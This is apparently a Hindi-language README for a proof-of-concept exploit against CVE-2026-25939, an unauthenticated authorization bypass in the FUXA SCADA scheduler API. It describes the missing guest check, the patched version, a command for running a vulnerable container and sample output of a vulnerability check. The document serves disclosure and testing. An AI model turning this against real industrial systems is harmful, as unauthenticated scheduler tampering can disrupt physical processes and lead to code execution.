
CVE-2026-25939 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, FUXA SCADA सॉफ्टवेयर में एक अनप्रमाणित प्राधिकरण बायपास जो मनमाने शेड्यूलर हेरफेर और संभावित RCE की अनुमति देता है।
मोहम्मद इदरीस बन्यामेर सुरक्षा शोधकर्ता
इस रिपॉजिटरी में CVE-2026-25939 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो FUXA (ओपन-सोर्स SCADA/ICS सॉफ्टवेयर) में एक गंभीर प्राधिकरण बायपास भेद्यता है। यह भेद्यता बिना प्रमाणीकरण के दूरस्थ हमलावरों को मनमाने शेड्यूलर प्रविष्टियाँ बनाने, संशोधित करने और हटाने की अनुमति देती है, जिससे संभावित रूप से दूरस्थ कोड निष्पादन और औद्योगिक नियंत्रण प्रणाली में हेरफेर हो सकता है।
यह भेद्यता /api/scheduler एंडपॉइंट में मौजूद है, जहाँ POST और DELETE दोनों हैंडलर में अतिथि उपयोगकर्ता प्रमाणीकरण जाँच अनुपस्थित थी। v1.2.11 में पैच ने स्पष्ट authJwt.isGuestUser() सत्यापन जोड़ा।
POST /api/scheduler - शेड्यूलर बनाना/संशोधित करनाDELETE /api/scheduler - शेड्यूलर हटानाउदाहरण 1: भेद्यता मूल्यांकन
docker run -p 1881:1881 -d fuxa:v1.2.10
$ python CVE-2026-25939.py http://192.168.1.100:1881 --check
[*] Checking vulnerability status for http://192.168.1.100:1881
[*] Testing guest access to scheduler API...
[*] GET Response Status: 200
[*] Testing scheduler creation...
[*] POST Response Status: 200
[!] VULNERABLE: Target accepts unauthenticated scheduler creation
[!] This indicates version < 1.2.11